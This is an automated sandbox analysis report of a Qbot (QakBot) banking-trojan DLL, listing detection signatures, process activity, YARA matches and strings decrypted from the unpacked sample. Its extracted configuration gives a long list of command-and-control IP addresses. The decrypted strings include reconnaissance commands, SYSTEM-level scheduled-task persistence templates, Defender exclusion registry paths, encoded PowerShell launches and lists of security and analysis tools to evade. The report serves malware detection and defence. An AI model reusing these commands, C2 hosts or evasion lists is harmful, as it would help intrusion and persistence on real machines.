Edit tour

Windows Analysis Report
F086.dll

Overview

General Information

Sample Name:	F086.dll
Analysis ID:	878699
MD5:	931f3d361902807103b23fa74beb16a2
SHA1:	9ec1f75beaf217246fd8d97fa3d1e591300babb3
SHA256:	5f1a29b7907453a8785d9e6087a85c7bfab6b7fe3955bd645cb37ffdb20409c5
Tags:	dllqbot
Infos:

Detection

Qbot

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Sample uses string decryption to hide its real strings

Potentially malicious time measurement code found

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Connects to several IPs in different countries

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7012 cmdline: loaddll32.exe "C:\Users\user\Desktop\F086.dll" MD5: 3B4636AE519868037940CA5C4272091B)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7100 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 684 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 2752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7092 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6716 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6712 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5728 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5500 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 5752 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

rundll32.exe (PID: 5920 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3308 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
QakBot, qbotQbot	QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.	GOLD CABIN	http://contagiodump.blogspot.com/2010/11/template.html http://www.secureworks.com/research/threat-profiles/gold-lagoon http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7 https://asec.ahnlab.com/en/44662/	https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

Malware Configuration

Threatname: Qbot

{"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": ["12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.186.128.181:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078", "12.172.173.82:995", "77.86.98.236:443", "104.35.24.154:443", "213.64.33.61:2222", "47.149.134.231:443", "72.134.124.16:443", "47.34.30.133:443", "103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "188.28.19.84:443", "174.58.146.57:443", "94.207.104.225:443", "86.97.55.89:2222", "69.123.4.221:2222"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
decrypted.memstr	JoeSecurity_Qbot	Yara detected Qbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.rundll32.exe.280c00.0.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
18.2.rundll32.exe.280c00.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
18.2.rundll32.exe.41b0000.1.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
18.2.rundll32.exe.41b0000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
18.2.rundll32.exe.280c00.0.raw.unpack	MAL_QakBot_ConfigExtraction_Feb23	QakBot Config Extraction	kevoreilly	0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
18.2.rundll32.exe.280c00.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": ["12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.186.128.181:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078", "12.172.173.82:995", "77.86.98.236:443", "104.35.24.154:443", "213.64.33.61:2222", "47.149.134.231:443", "72.134.124.16:443", "47.34.30.133:443", "103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "188.28.19.84:443", "174.58.146.57:443", "94.207.104.225:443", "86.97.55.89:2222", "69.123.4.221:2222"]}

Sample uses string decryption to hide its real strings

Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: netstat -nao
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: runas
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ipconfig /all
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: net localgroup
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: nltest /domain_trusts /all_trusts
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Microsoft
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELF_TEST_1
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: p%08x
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Self test FAILED!!!
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Self test OK.
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: /t5
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: whoami /all
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cmd
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: route print
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .lnk
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: arp -a
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: net share
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cmd.exe /c set
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Self check
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %u;%u;%u;
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ProfileImagePath
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: at.exe %u:%u "%s" /I
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ProgramData
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Self check ok!
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: powershell.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: qwinsta
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: net view
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Component_08
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Start screenshot
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: schtasks.exe /Delete /F /TN %u
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: appidapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: c:\ProgramData
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Component_07
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: powershell.exe -encodedCommand %S
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: powershell.exe -encodedCommand
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: error res='%s' err=%d len=%u
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: netstat -nao
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: runas
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ipconfig /all
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SystemRoot
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: cscript.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: .dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: image/jpeg
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: LocalLow
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: displayName
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: shlwapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CommandLine
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: kernel32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: 1234567890
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wbj.go
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_DiskDrive
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: System32
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Name
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: WRSA.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: c:\\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SpyNetReporting
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: FALSE
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: aswhookx.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Packages
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: RepUx.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Winsta0
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: root\SecurityCenter2
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: MsMpEng.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: userenv.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: csc_ui.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: \\.\pipe\
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: pstorec.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: NTUSER.DAT
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: from
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: netapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: gdi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: setupapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: iphlpapi.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Caption
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: CrAmTray.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: user32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticuser.exe;SentinelAgent.exe;SentinelStaticuserScanner.exe;SentinelUI.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: \sf2.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: Software\Microsoft
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %S.%06d
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: bcrypt.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: wtsapi32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: shell32.dll
Source: 18.2.rundll32.exe.280c00.0.raw.unpack	String decryptor: TRUE
